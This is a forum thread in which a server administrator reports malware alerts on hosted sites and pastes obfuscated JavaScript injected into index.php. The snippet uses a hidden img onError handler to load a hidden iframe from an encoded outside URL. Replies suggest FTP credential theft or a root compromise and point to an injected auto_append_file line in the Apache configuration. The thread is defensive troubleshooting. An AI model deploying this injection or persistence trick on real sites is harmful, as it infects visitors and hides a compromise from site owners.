php Infection?

more123

New member
Joined
Jan 4, 2011
Messages
2
My Server is Centos 4. with DA 1.36.2
Apache 2.2.10 Running
DirectAdmin 1.36.2 Running
Exim 4.67 Running
MySQL 5.0.67 Running
Named 9.3.6 Running
ProFTPd 1.3.1 Running
sshd Running
dovecot 1.1.7 Running
Php 5.2.6 Installed
---------------------------------------
some websites run http://domain.com/index.php show up virus alerts
I had checked their code, but nothing found.

Yesterday, I install wordpress 3.04 the newest version. and create a new subdomain wp website. it show up virus alerts again.:mad:

I view the html source I found some code has added to my index.php


</body></html>
<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="5765" height="1" width="1"><img src="about:blank" onError='astro=unescape("%27");astru=unescape("%22");sksa=eval("document.getElementById("+astro+"seaid"+astro+").src=unescape("+astro+"%68%74%74%70%3A%2F%2F"+astro+")+document.getElementById("+astro+"5765"+astro+").id+unescape("+astro+"%2E%69%6E%2F"+astro+")+"+astro+"1294168884"+astro+"+unescape("+astro+"%2E%70%68%70"+astro+")");document.getElementById("seaid").src=sksa' style="width:300;height:300;border:0px;"><iframe id="seaid" src="about:blank"></iframe></div>

But when I reload the index.php the code disapper.:eek:

Any body could help?
 
Ever plan on upgrading all of your old software for one? Most of your version replies are old versions of software.
 
I run yum update everday.
exclude=apache* httpd* mod_* mysql* MySQL* da_* *ftp* exim* sendmail* php* bind-chroot*

should I rebuild php?
 
Probably you need upgrade all PHP applications: especially open-sourced scripts, CMS, etc.

Find last modified date for your injected PHP scripts, and find IPs in FTP logs for that periods. Perhaps your FTP passwords were stolen. Change passwords for accounts (Directadmin/FTP) with injected files.
 
cd /usr/local/directadmin/custombuild
./build update
./build clean
./build update_versions
 
@scsi,

We generally build rewrite_confs as well.

Do you not see the need to do that? Or am I missing something? Or causing problems?

Thanks.

Jeff
 
Last edited:
It's bots using FTP, that do that kind of injections in most cases. OS Windows viruses/trojans steal passwords to FTP accounts stored/cached by FTP clients (eg. Total Commander) and send them to master. After that bot browsing FTP injects specified files.
 
Sorry... rewrite_confs; I misremembered. I've edited my post.

Jeff
 
pretty sure you have a root hack, check usr/local/lib/php
for a file called sys.php
need to add this, in your httpd.config, look for this and remove the 2 lines starting with php_admin_value
</VirtualHost>
# php_admin_value error_reporting 0
# php_admin_value auto_append_file /usr/local/lib/php/sys.php
###</IfDefine>


My Server is Centos 4. with DA 1.36.2
Apache 2.2.10 Running
DirectAdmin 1.36.2 Running
Exim 4.67 Running
MySQL 5.0.67 Running
Named 9.3.6 Running
ProFTPd 1.3.1 Running
sshd Running
dovecot 1.1.7 Running
Php 5.2.6 Installed
---------------------------------------
some websites run http://domain.com/index.php show up virus alerts
I had checked their code, but nothing found.

Yesterday, I install wordpress 3.04 the newest version. and create a new subdomain wp website. it show up virus alerts again.:mad:

I view the html source I found some code has added to my index.php




But when I reload the index.php the code disapper.:eek:

Any body could help?
 
Last edited:
Back
Top